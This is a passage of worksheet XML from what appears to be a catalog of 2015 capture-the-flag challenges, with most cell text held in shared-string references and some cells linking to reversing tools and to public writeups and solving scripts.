      <c r="C175" s="30" t="s">
        <v>2878</v>
      </c>
      <c r="D175" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E175" s="30" t="s">
        <v>2080</v>
      </c>
      <c r="F175" s="30" t="s">
        <v>2879</v>
      </c>
      <c r="G175" s="40" t="s">
        <v>1139</v>
      </c>
    </row>
    <row r="176">
      <c r="A176" s="30" t="s">
        <v>1193</v>
      </c>
      <c r="B176" s="31">
        <v>2015.0</v>
      </c>
      <c r="C176" s="30" t="s">
        <v>2882</v>
      </c>
      <c r="D176" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E176" s="30" t="s">
        <v>2080</v>
      </c>
      <c r="F176" s="30" t="s">
        <v>2883</v>
      </c>
      <c r="G176" s="30" t="s">
        <v>2884</v>
      </c>
      <c r="H176" s="30"/>
    </row>
    <row r="177">
      <c r="A177" s="30" t="s">
        <v>1265</v>
      </c>
      <c r="B177" s="31">
        <v>2015.0</v>
      </c>
      <c r="C177" s="30" t="s">
        <v>2885</v>
      </c>
      <c r="D177" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E177" s="30" t="s">
        <v>2650</v>
      </c>
      <c r="F177" s="30" t="s">
        <v>2889</v>
      </c>
      <c r="G177" s="33" t="str">
        <f>HYPERLINK("https://sourceforge.net/projects/fceultra/?source=typ_redirect","FCEUX ")</f>
        <v>FCEUX </v>
      </c>
      <c r="H177" s="33" t="str">
        <f>HYPERLINK("http://archive.rpgclassics.com/subsites/twit/docs/text/","NES Reverse Engineering")</f>
        <v>NES Reverse Engineering</v>
      </c>
      <c r="I177" s="30" t="s">
        <v>2108</v>
      </c>
      <c r="J177" s="30"/>
    </row>
    <row r="178">
      <c r="A178" s="30" t="s">
        <v>1265</v>
      </c>
      <c r="B178" s="31">
        <v>2015.0</v>
      </c>
      <c r="C178" s="30" t="s">
        <v>2909</v>
      </c>
      <c r="D178" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E178" s="30" t="s">
        <v>2080</v>
      </c>
      <c r="F178" s="30" t="s">
        <v>2889</v>
      </c>
      <c r="G178" s="30" t="s">
        <v>2108</v>
      </c>
      <c r="H178" s="30"/>
      <c r="I178" s="30"/>
      <c r="J178" s="30"/>
    </row>
    <row r="179">
      <c r="A179" s="30" t="s">
        <v>1265</v>
      </c>
      <c r="B179" s="31">
        <v>2015.0</v>
      </c>
      <c r="C179" s="30" t="s">
        <v>2913</v>
      </c>
      <c r="D179" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E179" s="30" t="s">
        <v>2080</v>
      </c>
      <c r="F179" s="30" t="s">
        <v>2914</v>
      </c>
      <c r="G179" s="33" t="str">
        <f>HYPERLINK("http://lcamtuf.coredump.cx/afl/","all-fuzz")</f>
        <v>all-fuzz</v>
      </c>
      <c r="H179" s="30"/>
      <c r="I179" s="30"/>
      <c r="J179" s="30"/>
    </row>
    <row r="180">
      <c r="A180" s="113" t="s">
        <v>1300</v>
      </c>
      <c r="B180" s="115">
        <v>2015.0</v>
      </c>
      <c r="C180" s="113" t="s">
        <v>2917</v>
      </c>
      <c r="D180" s="113" t="s">
        <v>48</v>
      </c>
      <c r="E180" s="113" t="s">
        <v>2918</v>
      </c>
      <c r="F180" s="113" t="s">
        <v>2920</v>
      </c>
      <c r="G180" s="163" t="str">
        <f>HYPERLINK("https://www.genymotion.com/","Genymotion")</f>
        <v>Genymotion</v>
      </c>
    </row>
    <row r="181">
      <c r="A181" s="113" t="s">
        <v>1300</v>
      </c>
      <c r="B181" s="115">
        <v>2015.0</v>
      </c>
      <c r="C181" s="113" t="s">
        <v>2941</v>
      </c>
      <c r="D181" s="113" t="s">
        <v>48</v>
      </c>
      <c r="E181" s="113" t="s">
        <v>2918</v>
      </c>
      <c r="F181" s="113" t="s">
        <v>2944</v>
      </c>
      <c r="G181" s="113" t="s">
        <v>1139</v>
      </c>
    </row>
    <row r="182">
      <c r="A182" s="113" t="s">
        <v>1300</v>
      </c>
      <c r="B182" s="115">
        <v>2015.0</v>
      </c>
      <c r="C182" s="113" t="s">
        <v>211</v>
      </c>
      <c r="D182" s="113" t="s">
        <v>48</v>
      </c>
      <c r="E182" s="113" t="s">
        <v>300</v>
      </c>
      <c r="F182" s="113" t="s">
        <v>2952</v>
      </c>
      <c r="G182" s="113" t="s">
        <v>1139</v>
      </c>
    </row>
    <row r="183">
      <c r="A183" s="164" t="s">
        <v>1300</v>
      </c>
      <c r="B183" s="165">
        <v>2015.0</v>
      </c>
      <c r="C183" s="164" t="s">
        <v>2974</v>
      </c>
      <c r="D183" s="164" t="s">
        <v>23</v>
      </c>
      <c r="E183" s="164" t="s">
        <v>2080</v>
      </c>
      <c r="F183" s="164" t="s">
        <v>2975</v>
      </c>
      <c r="G183" s="109"/>
      <c r="H183" s="30"/>
    </row>
    <row r="184">
      <c r="A184" s="153" t="s">
        <v>1884</v>
      </c>
      <c r="B184" s="154">
        <v>2015.0</v>
      </c>
      <c r="C184" s="153" t="s">
        <v>2976</v>
      </c>
      <c r="D184" s="153" t="s">
        <v>23</v>
      </c>
      <c r="E184" s="153" t="s">
        <v>2977</v>
      </c>
      <c r="F184" s="153" t="s">
        <v>2978</v>
      </c>
      <c r="G184" s="137"/>
      <c r="H184" s="3"/>
    </row>
    <row r="185">
      <c r="A185" s="153" t="s">
        <v>1884</v>
      </c>
      <c r="B185" s="154">
        <v>2015.0</v>
      </c>
      <c r="C185" s="153" t="s">
        <v>2979</v>
      </c>
      <c r="D185" s="153" t="s">
        <v>23</v>
      </c>
      <c r="E185" s="153" t="s">
        <v>2977</v>
      </c>
      <c r="F185" s="153" t="s">
        <v>2982</v>
      </c>
      <c r="G185" s="137"/>
      <c r="H185" s="3"/>
    </row>
    <row r="186">
      <c r="A186" s="5" t="s">
        <v>1303</v>
      </c>
      <c r="B186" s="43">
        <v>2015.0</v>
      </c>
      <c r="C186" s="5" t="s">
        <v>2984</v>
      </c>
      <c r="D186" s="5" t="s">
        <v>48</v>
      </c>
      <c r="E186" s="5" t="s">
        <v>407</v>
      </c>
      <c r="F186" s="5" t="s">
        <v>2987</v>
      </c>
      <c r="G186" s="3"/>
      <c r="H186" s="3"/>
    </row>
    <row r="187">
      <c r="A187" s="5" t="s">
        <v>1303</v>
      </c>
      <c r="B187" s="43">
        <v>2015.0</v>
      </c>
      <c r="C187" s="5" t="s">
        <v>2992</v>
      </c>
      <c r="D187" s="5" t="s">
        <v>128</v>
      </c>
      <c r="E187" s="5" t="s">
        <v>2993</v>
      </c>
      <c r="F187" s="5" t="s">
        <v>2995</v>
      </c>
      <c r="G187" s="56" t="s">
        <v>2996</v>
      </c>
      <c r="H187" s="5" t="s">
        <v>3001</v>
      </c>
    </row>
    <row r="188">
      <c r="A188" s="5" t="s">
        <v>1303</v>
      </c>
      <c r="B188" s="43">
        <v>2015.0</v>
      </c>
      <c r="C188" s="5" t="s">
        <v>3005</v>
      </c>
      <c r="D188" s="5" t="s">
        <v>48</v>
      </c>
      <c r="E188" s="5" t="s">
        <v>2977</v>
      </c>
      <c r="F188" s="5" t="s">
        <v>3006</v>
      </c>
      <c r="G188" s="5" t="s">
        <v>3007</v>
      </c>
      <c r="H188" s="3"/>
    </row>
    <row r="189">
      <c r="A189" s="5" t="s">
        <v>1303</v>
      </c>
      <c r="B189" s="43">
        <v>2015.0</v>
      </c>
      <c r="C189" s="5" t="s">
        <v>3008</v>
      </c>
      <c r="D189" s="5" t="s">
        <v>128</v>
      </c>
      <c r="E189" s="5" t="s">
        <v>300</v>
      </c>
      <c r="F189" s="5" t="s">
        <v>3009</v>
      </c>
      <c r="G189" s="5" t="s">
        <v>3011</v>
      </c>
      <c r="H189" s="3"/>
    </row>
    <row r="190">
      <c r="A190" s="5" t="s">
        <v>1303</v>
      </c>
      <c r="B190" s="43">
        <v>2015.0</v>
      </c>
      <c r="C190" s="5" t="s">
        <v>3015</v>
      </c>
      <c r="D190" s="5" t="s">
        <v>1363</v>
      </c>
      <c r="E190" s="5" t="s">
        <v>300</v>
      </c>
      <c r="F190" s="5" t="s">
        <v>3019</v>
      </c>
      <c r="G190" s="3"/>
      <c r="H190" s="3"/>
    </row>
    <row r="191">
      <c r="A191" s="30" t="s">
        <v>1334</v>
      </c>
      <c r="B191" s="31">
        <v>2015.0</v>
      </c>
      <c r="C191" s="30" t="s">
        <v>3020</v>
      </c>
      <c r="D191" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E191" s="30" t="s">
        <v>3021</v>
      </c>
      <c r="F191" s="30" t="s">
        <v>3022</v>
      </c>
      <c r="G191" s="30" t="s">
        <v>3023</v>
      </c>
      <c r="H191" s="30"/>
      <c r="I191" s="30"/>
    </row>
    <row r="192">
      <c r="A192" s="109" t="s">
        <v>1334</v>
      </c>
      <c r="B192" s="126">
        <v>2015.0</v>
      </c>
      <c r="C192" s="109" t="s">
        <v>3024</v>
      </c>
      <c r="D192" s="109" t="s">
        <v>23</v>
      </c>
      <c r="E192" s="109" t="s">
        <v>407</v>
      </c>
      <c r="F192" s="109" t="s">
        <v>3025</v>
      </c>
      <c r="G192" s="109"/>
      <c r="H192" s="30"/>
      <c r="I192" s="30"/>
    </row>
    <row r="193">
      <c r="A193" s="30" t="s">
        <v>1334</v>
      </c>
      <c r="B193" s="31">
        <v>2015.0</v>
      </c>
      <c r="C193" s="30" t="s">
        <v>3026</v>
      </c>
      <c r="D193" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E193" s="30" t="s">
        <v>407</v>
      </c>
      <c r="F193" s="30" t="s">
        <v>3027</v>
      </c>
      <c r="G193" s="30"/>
      <c r="H193" s="30"/>
      <c r="I193" s="30"/>
    </row>
    <row r="194">
      <c r="A194" s="30" t="s">
        <v>1334</v>
      </c>
      <c r="B194" s="31">
        <v>2015.0</v>
      </c>
      <c r="C194" s="30" t="s">
        <v>3030</v>
      </c>
      <c r="D194" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E194" s="30"/>
      <c r="F194" s="30" t="s">
        <v>3035</v>
      </c>
      <c r="G194" s="30"/>
      <c r="H194" s="30"/>
      <c r="I194" s="30"/>
    </row>
    <row r="195">
      <c r="A195" s="30" t="s">
        <v>1348</v>
      </c>
      <c r="B195" s="31">
        <v>2015.0</v>
      </c>
      <c r="C195" s="30" t="s">
        <v>3037</v>
      </c>
      <c r="D195" s="30" t="s">
        <v>508</v>
      </c>
      <c r="E195" s="30" t="s">
        <v>407</v>
      </c>
      <c r="F195" s="30" t="s">
        <v>3040</v>
      </c>
      <c r="G195" s="30" t="s">
        <v>3041</v>
      </c>
      <c r="H195" s="30" t="s">
        <v>2767</v>
      </c>
      <c r="I195" s="30"/>
    </row>
    <row r="196">
      <c r="A196" s="30" t="s">
        <v>1988</v>
      </c>
      <c r="B196" s="31">
        <v>2015.0</v>
      </c>
      <c r="C196" s="30" t="s">
        <v>3046</v>
      </c>
      <c r="D196" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E196" s="30" t="s">
        <v>1805</v>
      </c>
      <c r="F196" s="30" t="s">
        <v>3048</v>
      </c>
      <c r="G196" s="30"/>
      <c r="H196" s="30"/>
      <c r="I196" s="30"/>
    </row>
    <row r="197">
      <c r="A197" s="30" t="s">
        <v>1988</v>
      </c>
      <c r="B197" s="31">
        <v>2015.0</v>
      </c>
      <c r="C197" s="30" t="s">
        <v>3051</v>
      </c>
      <c r="D197" s="30" t="s">
        <v>1363</v>
      </c>
      <c r="E197" s="30" t="s">
        <v>3053</v>
      </c>
      <c r="F197" s="30" t="s">
        <v>3056</v>
      </c>
      <c r="G197" s="30"/>
      <c r="H197" s="30"/>
      <c r="I197" s="30"/>
    </row>
    <row r="198">
      <c r="A198" s="5" t="s">
        <v>1368</v>
      </c>
      <c r="B198" s="43">
        <v>2015.0</v>
      </c>
      <c r="C198" s="5" t="s">
        <v>3059</v>
      </c>
      <c r="D198" s="5" t="s">
        <v>128</v>
      </c>
      <c r="E198" s="5" t="s">
        <v>3061</v>
      </c>
      <c r="F198" s="5" t="s">
        <v>3062</v>
      </c>
      <c r="G198" s="3"/>
    </row>
    <row r="199">
      <c r="A199" s="5" t="s">
        <v>1368</v>
      </c>
      <c r="B199" s="43">
        <v>2015.0</v>
      </c>
      <c r="C199" s="5" t="s">
        <v>3066</v>
      </c>
      <c r="D199" s="5" t="s">
        <v>48</v>
      </c>
      <c r="E199" s="5" t="s">
        <v>407</v>
      </c>
      <c r="F199" s="5" t="s">
        <v>3067</v>
      </c>
      <c r="G199" s="3"/>
    </row>
    <row r="200">
      <c r="A200" s="5" t="s">
        <v>1368</v>
      </c>
      <c r="B200" s="43">
        <v>2015.0</v>
      </c>
      <c r="C200" s="5" t="s">
        <v>3068</v>
      </c>
      <c r="D200" s="5" t="s">
        <v>128</v>
      </c>
      <c r="E200" s="5" t="s">
        <v>676</v>
      </c>
      <c r="F200" s="5" t="s">
        <v>3070</v>
      </c>
      <c r="G200" s="56" t="s">
        <v>3071</v>
      </c>
    </row>
    <row r="201">
      <c r="A201" s="5" t="s">
        <v>1368</v>
      </c>
      <c r="B201" s="43">
        <v>2015.0</v>
      </c>
      <c r="C201" s="5" t="s">
        <v>3493</v>
      </c>
      <c r="D201" s="5" t="s">
        <v>48</v>
      </c>
      <c r="E201" s="5" t="s">
        <v>3495</v>
      </c>
      <c r="F201" s="5" t="s">
        <v>3497</v>
      </c>
      <c r="G201" s="56" t="s">
        <v>3499</v>
      </c>
    </row>
    <row r="202">
      <c r="A202" s="5" t="s">
        <v>1431</v>
      </c>
      <c r="B202" s="43">
        <v>2015.0</v>
      </c>
      <c r="C202" s="5" t="s">
        <v>3674</v>
      </c>
      <c r="D202" s="5" t="s">
        <v>23</v>
      </c>
      <c r="E202" s="5" t="s">
        <v>676</v>
      </c>
      <c r="F202" s="5" t="s">
        <v>3675</v>
      </c>
      <c r="G202" s="3"/>
    </row>
    <row r="203">
      <c r="A203" s="5" t="s">
        <v>1431</v>
      </c>
      <c r="B203" s="43">
        <v>2015.0</v>
      </c>
      <c r="C203" s="5" t="s">
        <v>3676</v>
      </c>
      <c r="D203" s="5" t="s">
        <v>23</v>
      </c>
      <c r="E203" s="5" t="s">
        <v>676</v>
      </c>
      <c r="F203" s="5" t="s">
        <v>3677</v>
      </c>
      <c r="G203" s="3"/>
    </row>
    <row r="204">
      <c r="A204" s="5" t="s">
        <v>1431</v>
      </c>
      <c r="B204" s="43">
        <v>2015.0</v>
      </c>
      <c r="C204" s="5" t="s">
        <v>3681</v>
      </c>
      <c r="D204" s="5" t="s">
        <v>23</v>
      </c>
      <c r="E204" s="5" t="s">
        <v>407</v>
      </c>
      <c r="F204" s="5" t="s">
        <v>130</v>
      </c>
      <c r="G204" s="3"/>
    </row>
    <row r="205">
      <c r="A205" s="5" t="s">
        <v>1446</v>
      </c>
      <c r="B205" s="43">
        <v>2015.0</v>
      </c>
      <c r="C205" s="5" t="s">
        <v>3687</v>
      </c>
      <c r="D205" s="5" t="s">
        <v>23</v>
      </c>
      <c r="E205" s="5" t="s">
        <v>407</v>
      </c>
      <c r="F205" s="5" t="s">
        <v>3689</v>
      </c>
      <c r="G205" s="3"/>
    </row>
    <row r="206">
      <c r="A206" s="5" t="s">
        <v>1453</v>
      </c>
      <c r="B206" s="43">
        <v>2015.0</v>
      </c>
      <c r="C206" s="5" t="s">
        <v>3692</v>
      </c>
      <c r="D206" s="5" t="s">
        <v>48</v>
      </c>
      <c r="E206" s="5" t="s">
        <v>3694</v>
      </c>
      <c r="F206" s="5" t="s">
        <v>3696</v>
      </c>
      <c r="G206" s="5" t="s">
        <v>3698</v>
      </c>
    </row>
    <row r="207">
      <c r="A207" s="30" t="s">
        <v>3699</v>
      </c>
      <c r="B207" s="31">
        <v>2015.0</v>
      </c>
      <c r="C207" s="30" t="s">
        <v>3701</v>
      </c>
      <c r="D207" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E207" s="30" t="s">
        <v>407</v>
      </c>
      <c r="F207" s="30" t="s">
        <v>3703</v>
      </c>
      <c r="G207" s="30"/>
      <c r="H207" s="30"/>
      <c r="I207" s="30"/>
    </row>
    <row r="208">
      <c r="A208" s="30" t="s">
        <v>2051</v>
      </c>
      <c r="B208" s="31">
        <v>2015.0</v>
      </c>
      <c r="C208" s="30" t="s">
        <v>3704</v>
      </c>
      <c r="D208" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E208" s="30" t="s">
        <v>407</v>
      </c>
      <c r="F208" s="30" t="s">
        <v>3706</v>
      </c>
      <c r="G208" s="30"/>
      <c r="H208" s="30"/>
      <c r="I208" s="30"/>
    </row>
    <row r="209">
      <c r="A209" s="17">
        <v>42577.0</v>
      </c>
      <c r="B209" s="65"/>
      <c r="C209" s="65"/>
      <c r="D209" s="65"/>
      <c r="E209" s="9"/>
      <c r="F209" s="65"/>
      <c r="G209" s="65"/>
      <c r="H209" s="66"/>
      <c r="I209" s="9"/>
      <c r="J209" s="9"/>
      <c r="K209" s="9"/>
      <c r="L209" s="9"/>
      <c r="M209" s="9"/>
      <c r="N209" s="9"/>
      <c r="O209" s="9"/>
      <c r="P209" s="9"/>
      <c r="Q209" s="9"/>
      <c r="R209" s="9"/>
      <c r="S209" s="9"/>
      <c r="T209" s="9"/>
      <c r="U209" s="9"/>
      <c r="V209" s="9"/>
      <c r="W209" s="9"/>
      <c r="X209" s="9"/>
      <c r="Y209" s="9"/>
      <c r="Z209" s="9"/>
    </row>
    <row r="210">
      <c r="A210" s="30" t="s">
        <v>1473</v>
      </c>
      <c r="B210" s="31">
        <v>2015.0</v>
      </c>
      <c r="C210" s="30" t="s">
        <v>3716</v>
      </c>
      <c r="D210" s="30" t="s">
        <v>1474</v>
      </c>
      <c r="E210" s="30" t="s">
        <v>2080</v>
      </c>
      <c r="F210" s="30" t="s">
        <v>3717</v>
      </c>
      <c r="G210" s="30" t="s">
        <v>3411</v>
      </c>
      <c r="H210" s="30"/>
      <c r="I210" s="30"/>
    </row>
    <row r="211">
      <c r="A211" s="30" t="s">
        <v>1473</v>
      </c>
      <c r="B211" s="31">
        <v>2015.0</v>
      </c>
      <c r="C211" s="30" t="s">
        <v>3719</v>
      </c>
      <c r="D211" s="30" t="s">
        <v>1474</v>
      </c>
      <c r="E211" s="30" t="s">
        <v>2080</v>
      </c>
      <c r="F211" s="30" t="s">
        <v>3720</v>
      </c>
      <c r="G211" s="30" t="s">
        <v>3411</v>
      </c>
      <c r="H211" s="30"/>
      <c r="I211" s="30"/>
      <c r="J211" s="30"/>
    </row>
    <row r="212">
      <c r="A212" s="30" t="s">
        <v>1473</v>
      </c>
      <c r="B212" s="31">
        <v>2015.0</v>
      </c>
      <c r="C212" s="30" t="s">
        <v>3723</v>
      </c>
      <c r="D212" s="30" t="s">
        <v>3617</v>
      </c>
      <c r="E212" s="30" t="s">
        <v>2080</v>
      </c>
      <c r="F212" s="30" t="s">
        <v>3725</v>
      </c>
      <c r="G212" s="30" t="s">
        <v>3411</v>
      </c>
      <c r="H212" s="30"/>
      <c r="I212" s="30"/>
    </row>
    <row r="213">
      <c r="A213" s="30" t="s">
        <v>1473</v>
      </c>
      <c r="B213" s="31">
        <v>2015.0</v>
      </c>
      <c r="C213" s="30" t="s">
        <v>3730</v>
      </c>
      <c r="D213" s="30" t="s">
        <v>3617</v>
      </c>
      <c r="E213" s="30" t="s">
        <v>2080</v>
      </c>
      <c r="F213" s="30" t="s">
        <v>3735</v>
      </c>
      <c r="G213" s="30" t="s">
        <v>3411</v>
      </c>
      <c r="H213" s="30"/>
      <c r="I213" s="30"/>
    </row>
    <row r="214">
      <c r="A214" s="30" t="s">
        <v>1505</v>
      </c>
      <c r="B214" s="31">
        <v>2015.0</v>
      </c>
      <c r="C214" s="30" t="s">
        <v>3738</v>
      </c>
      <c r="D214" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E214" s="30" t="s">
        <v>997</v>
      </c>
      <c r="F214" s="30" t="s">
        <v>3741</v>
      </c>
      <c r="G214" s="30" t="s">
        <v>3479</v>
      </c>
      <c r="H214" s="33" t="str">
        <f>HYPERLINK("https://github.com/smokeleeteveryday/CTF_WRITEUPS/blob/master/2015/DEFCONCTF/reversing/accesscontrol/solution/accesscontrol_crack.py","Solving script")</f>
        <v>Solving script</v>
      </c>
      <c r="I214" s="30"/>
    </row>
    <row r="215">
      <c r="A215" s="30" t="s">
        <v>1505</v>
      </c>
      <c r="B215" s="31">
        <v>2015.0</v>
      </c>
      <c r="C215" s="30" t="s">
        <v>3771</v>
      </c>
      <c r="D215" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E215" s="35" t="s">
        <v>2352</v>
      </c>
      <c r="F215" s="30" t="s">
        <v>3777</v>
      </c>
      <c r="G215" s="30" t="s">
        <v>3479</v>
      </c>
      <c r="H215" s="33" t="str">
        <f>HYPERLINK("https://klee.github.io/","KLEE LLVM engine")</f>
        <v>KLEE LLVM engine</v>
      </c>
      <c r="I215" s="30"/>
    </row>
    <row r="216">
      <c r="A216" s="30" t="s">
        <v>1505</v>
      </c>
      <c r="B216" s="31">
        <v>2015.0</v>
      </c>
      <c r="C216" s="30" t="s">
        <v>3781</v>
      </c>
      <c r="D216" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E216" s="30" t="s">
        <v>997</v>
      </c>
      <c r="F216" s="30" t="s">
        <v>3785</v>
      </c>
      <c r="G216" s="30" t="s">
        <v>3479</v>
      </c>
      <c r="H216" s="30"/>
      <c r="I216" s="30"/>
    </row>
    <row r="217">
      <c r="A217" s="30" t="s">
        <v>1588</v>
      </c>
      <c r="B217" s="31">
        <v>2015.0</v>
      </c>
      <c r="C217" s="30" t="s">
        <v>3787</v>
      </c>
      <c r="D217" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E217" s="30" t="s">
        <v>3788</v>
      </c>
      <c r="F217" s="144" t="s">
        <v>3790</v>
      </c>
      <c r="G217" s="30" t="s">
        <v>3791</v>
      </c>
      <c r="H217" s="30"/>
    </row>
    <row r="218">
      <c r="A218" s="30" t="s">
        <v>1588</v>
      </c>
      <c r="B218" s="31">
        <v>2015.0</v>
      </c>
      <c r="C218" s="30" t="s">
        <v>3793</v>
      </c>
      <c r="D218" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E218" s="30" t="s">
        <v>3795</v>
      </c>
      <c r="F218" s="30" t="s">
        <v>3797</v>
      </c>
      <c r="G218" s="30" t="s">
        <v>3791</v>
      </c>
      <c r="H218" s="30"/>
    </row>
    <row r="219">
      <c r="A219" s="30" t="s">
        <v>1607</v>
      </c>
      <c r="B219" s="31">
        <v>2015.0</v>
      </c>
      <c r="C219" s="30" t="s">
        <v>3800</v>
      </c>
      <c r="D219" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E219" s="30" t="s">
        <v>2080</v>
      </c>
      <c r="F219" s="30" t="s">
        <v>3804</v>
      </c>
      <c r="G219" s="30" t="s">
        <v>3806</v>
      </c>
      <c r="H219" s="30"/>
      <c r="I219" s="30"/>
    </row>
    <row r="220">
      <c r="A220" s="30" t="s">
        <v>1607</v>
      </c>
      <c r="B220" s="31">
        <v>2015.0</v>
      </c>
      <c r="C220" s="30" t="s">
        <v>3808</v>
      </c>
      <c r="D220" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E220" s="30" t="s">
        <v>997</v>
      </c>
      <c r="F220" s="30" t="s">
        <v>3811</v>
      </c>
      <c r="G220" s="33" t="str">
        <f>HYPERLINK("http://www.pcre.org/","PCRE Information")</f>
        <v>PCRE Information</v>
      </c>
      <c r="H220" s="30" t="s">
        <v>3806</v>
      </c>
      <c r="I220" s="30"/>
    </row>
    <row r="221">
      <c r="A221" s="30" t="s">
        <v>1607</v>
      </c>
      <c r="B221" s="31">
        <v>2015.0</v>
      </c>
      <c r="C221" s="30" t="s">
        <v>3822</v>
      </c>
      <c r="D221" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E221" s="30" t="s">
        <v>3823</v>
      </c>
      <c r="F221" s="33" t="str">
        <f>HYPERLINK("https://github.com/duc-le/ctf-writeups/blob/master/2015_hack.lu_CTF/%2324_Zoo/writeup.md","Writeup")</f>
        <v>Writeup</v>
      </c>
      <c r="G221" s="30"/>
      <c r="H221" s="30"/>
      <c r="I221" s="30"/>
    </row>
    <row r="222">
      <c r="A222" s="109" t="s">
        <v>1665</v>
      </c>
      <c r="B222" s="126">
        <v>2015.0</v>
      </c>
      <c r="C222" s="109" t="s">
        <v>3834</v>
      </c>
      <c r="D222" s="109" t="s">
        <v>23</v>
      </c>
      <c r="E222" s="109" t="s">
        <v>3838</v>
      </c>
      <c r="F222" s="109" t="s">
        <v>3841</v>
      </c>
      <c r="G222" s="109" t="s">
        <v>3842</v>
      </c>
      <c r="H222" s="30"/>
    </row>
    <row r="223">
      <c r="A223" s="30" t="s">
        <v>1665</v>
      </c>
      <c r="B223" s="31">
        <v>2015.0</v>
      </c>
      <c r="C223" s="30" t="s">
        <v>1195</v>
      </c>
      <c r="D223" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E223" s="30" t="s">
        <v>3463</v>
      </c>
      <c r="F223" s="30" t="s">
        <v>3846</v>
      </c>
      <c r="G223" s="33" t="str">
        <f>HYPERLINK("https://hxp.io/blog/18/MMACTF%202015:%20Reversing%20150%20%22Impossible/?%22%20writeup/","writeup")</f>
        <v>writeup</v>
      </c>
      <c r="H223" s="30"/>
      <c r="I223" s="30"/>
    </row>
    <row r="224">
      <c r="A224" s="30" t="s">
        <v>1665</v>
      </c>
      <c r="B224" s="31">
        <v>2015.0</v>
      </c>
      <c r="C224" s="30" t="s">
        <v>3854</v>
      </c>
      <c r="D224" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E224" s="30" t="s">
        <v>997</v>
      </c>
      <c r="F224" s="180" t="s">
        <v>3865</v>
      </c>
      <c r="G224" s="33" t="str">
        <f>HYPERLINK("http://www.cs.cornell.edu/courses/cs3110/2008fa/lectures/lec21.html","multiplicative hash functions")</f>
        <v>multiplicative hash functions</v>
      </c>
      <c r="H224" s="33" t="str">
        <f>HYPERLINK("https://github.com/smokeleeteveryday/CTF_WRITEUPS/tree/master/2015/MMACTF/reversing/simple_hash","writeup and script")</f>
        <v>writeup and script</v>
      </c>
      <c r="I224" s="30"/>
    </row>
    <row r="225">
      <c r="A225" s="30" t="s">
        <v>1665</v>
      </c>
      <c r="B225" s="31">
        <v>2015.0</v>
      </c>
      <c r="C225" s="30" t="s">
        <v>3894</v>
      </c>
      <c r="D225" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E225" s="30" t="s">
        <v>997</v>
      </c>
      <c r="F225" s="30" t="s">
        <v>3897</v>
      </c>
      <c r="G225" s="30" t="s">
        <v>3899</v>
      </c>
      <c r="H225" s="33" t="str">
        <f>HYPERLINK("http://ctfhacker.com/ctf/pwnable/2015/09/07/mmactf-moneygame.html","writeup and script")</f>
        <v>writeup and script</v>
      </c>
      <c r="I225" s="30"/>
    </row>
    <row r="226">
      <c r="A226" s="30" t="s">
        <v>1815</v>
      </c>
      <c r="B226" s="31">
        <v>2015.0</v>
      </c>
      <c r="C226" s="30" t="s">
        <v>3917</v>
      </c>
      <c r="D226" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E226" s="30" t="s">
        <v>997</v>
      </c>
      <c r="F226" s="30" t="s">
        <v>3981</v>
      </c>
      <c r="G226" s="33" t="str">
        <f>HYPERLINK("https://github.com/sebastianbiallas/ht","HT Binary Editor")</f>
        <v>HT Binary Editor</v>
      </c>
      <c r="H226" s="33" t="str">
        <f>HYPERLINK("https://github.com/smokeleeteveryday/CTF_WRITEUPS/tree/master/2015/NUITDUHACK/reverse/clarkkent","Writeup and Script")</f>
        <v>Writeup and Script</v>
      </c>
      <c r="I226" s="30"/>
      <c r="J226" s="30"/>
      <c r="K226" s="30"/>
    </row>
    <row r="227">
      <c r="A227" s="30" t="s">
        <v>1815</v>
      </c>
      <c r="B227" s="31">
        <v>2015.0</v>
      </c>
      <c r="C227" s="30" t="s">
        <v>4001</v>
      </c>
      <c r="D227" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E227" s="30" t="s">
        <v>997</v>
      </c>
      <c r="F227" s="30" t="s">
        <v>4002</v>
      </c>
      <c r="G227" s="33" t="str">
        <f>HYPERLINK("https://github.com/smokeleeteveryday/CTF_WRITEUPS/tree/master/2015/NUITDUHACK/reverse/crackmeprime","writeup and script")</f>
        <v>writeup and script</v>
      </c>
      <c r="H227" s="30"/>
      <c r="I227" s="30"/>
      <c r="J227" s="30"/>
      <c r="K227" s="30"/>
    </row>
    <row r="228">
      <c r="A228" s="30" t="s">
        <v>1815</v>
      </c>
      <c r="B228" s="31">
        <v>2015.0</v>
      </c>
      <c r="C228" s="30" t="s">
        <v>4011</v>
      </c>
      <c r="D228" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E228" s="30" t="s">
        <v>2284</v>
      </c>
      <c r="F228" s="30" t="s">
        <v>4016</v>
      </c>
      <c r="G228" s="33" t="str">
        <f>HYPERLINK("http://pid.gamecopyworld.com/","ProtectionID - Game Copy World")</f>
        <v>ProtectionID - Game Copy World</v>
      </c>
      <c r="H228" s="30" t="s">
        <v>4025</v>
      </c>
      <c r="I228" s="33" t="str">
        <f>HYPERLINK("https://sourceforge.net/projects/crunch-wordlist/","Crunch Wordlist Generator ")</f>
        <v>Crunch Wordlist Generator </v>
      </c>
      <c r="J228" s="33" t="str">
        <f>HYPERLINK("https://hexpresso.wordpress.com/2015/04/05/quals_ndh-2k15-mass-surveillance-software-300-writeup/","writeup and script")</f>
        <v>writeup and script</v>
      </c>
      <c r="K228" s="30"/>
    </row>
    <row r="229">
      <c r="A229" s="30" t="s">
        <v>1815</v>
      </c>
      <c r="B229" s="31">
        <v>2015.0</v>
      </c>
